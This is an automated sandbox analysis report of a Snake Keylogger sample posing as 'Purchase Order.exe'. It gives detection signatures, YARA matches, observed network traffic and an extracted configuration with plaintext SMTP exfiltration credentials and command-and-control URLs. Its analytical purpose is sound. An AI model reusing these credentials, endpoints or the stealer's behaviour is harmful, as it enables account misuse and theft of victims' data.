Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name:Purchase Order.exe
Analysis ID:1420020
MD5:654c1586b15a278983493f57f72cacb7
SHA1:5b6df8769764505ffdb7691ac2150d4327eb8104
SHA256:191239a61c70ba900694d294a164f4a162b84d11672871fbb5389967bbf52c7e
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Purchase Order.exe (PID: 5304 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 654C1586B15A278983493F57F72CACB7)
    • Purchase Order.exe (PID: 2412 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 654C1586B15A278983493F57F72CACB7)
    • Purchase Order.exe (PID: 3304 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 654C1586B15A278983493F57F72CACB7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14782:$a1: get_encryptedPassword
        • 0x14a78:$a2: get_encryptedUsername
        • 0x1458e:$a3: get_timePasswordChanged
        • 0x14689:$a4: get_passwordField
        • 0x14798:$a5: set_encryptedPassword
        • 0x15d9b:$a7: get_logins
        • 0x15cfe:$a10: KeyLoggerEventArgs
        • 0x15997:$a11: KeyLoggerEventArgsEventHandler
        00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x180c0:$x1: $%SMTPDV$
        • 0x18124:$x2: $#TheHashHere%&
        • 0x1975f:$x3: %FTPDV$
        • 0x19853:$x4: $%TelegramDv$
        • 0x15997:$x5: KeyLoggerEventArgs
        • 0x15cfe:$x5: KeyLoggerEventArgs
        • 0x19783:$m2: Clipboard Logs ID
        • 0x1994f:$m2: Screenshot Logs ID
        • 0x19a1b:$m2: keystroke Logs ID
        • 0x19927:$m4: \SnakeKeylogger\
        Click to see the 14 entries
        SourceRuleDescriptionAuthorStrings
        0.2.Purchase Order.exe.39cb798.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.Purchase Order.exe.39cb798.7.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.Purchase Order.exe.39cb798.7.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12b82:$a1: get_encryptedPassword
            • 0x12e78:$a2: get_encryptedUsername
            • 0x1298e:$a3: get_timePasswordChanged
            • 0x12a89:$a4: get_passwordField
            • 0x12b98:$a5: set_encryptedPassword
            • 0x1419b:$a7: get_logins
            • 0x140fe:$a10: KeyLoggerEventArgs
            • 0x13d97:$a11: KeyLoggerEventArgsEventHandler
            0.2.Purchase Order.exe.39cb798.7.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19b00:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
            0.2.Purchase Order.exe.39cb798.7.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x1372d:$s1: UnHook
            • 0x13734:$s2: SetHook
            • 0x1373c:$s3: CallNextHook
            • 0x13749:$s4: _hook
            Click to see the 26 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order.exe, Initiated: true, ProcessId: 3304, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
            Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}
            Source: scratchdreams.tkVirustotal: Detection: 6%Perma Link
            Source: http://scratchdreams.tkVirustotal: Detection: 6%Perma Link
            Source: https://scratchdreams.tkVirustotal: Detection: 15%Perma Link
            Source: Purchase Order.exeReversingLabs: Detection: 21%
            Source: Purchase Order.exeVirustotal: Detection: 29%Perma Link
            Source: Purchase Order.exeJoe Sandbox ML: detected
            Source: Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49710 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.5:49724 version: TLS 1.2
            Source: Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: EeBu.pdbSHA256 source: Purchase Order.exe
            Source: Binary string: EeBu.pdb source: Purchase Order.exe
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 0152FCD1h4_2_0152FA10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 0152EFDDh4_2_0152EDF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 0152F967h4_2_0152EDF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_0152E310
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC8945h4_2_06CC8608
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC72FAh4_2_06CC7050
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC6171h4_2_06CC5EC8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC58C1h4_2_06CC5618
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC6A21h4_2_06CC6778
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC0741h4_2_06CC0498
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC7751h4_2_06CC74A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC0FF1h4_2_06CC0D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC8001h4_2_06CC7D58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC5D19h4_2_06CC5A70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC6E79h4_2_06CC6BD0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_06CC33A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_06CC33B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC65C9h4_2_06CC6320
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC0B99h4_2_06CC08F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC02E9h4_2_06CC0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC5441h4_2_06CC5198
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC8459h4_2_06CC81B0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06CC7BA9h4_2_06CC7900

            Networking

            barindex
            Source: Yara matchFile source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.5:49733 -> 208.91.198.143:587
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 172.67.169.18 172.67.169.18
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: global trafficTCP traffic: 192.168.2.5:49733 -> 208.91.198.143:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49710 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003045000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000311B000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003069000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003157000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
            Source: Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003157000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
            Source: Purchase Order.exe, 00000004.00000002.4420689970.0000000003157000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.5:49724 version: TLS 1.2

            System Summary

            barindex
            Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
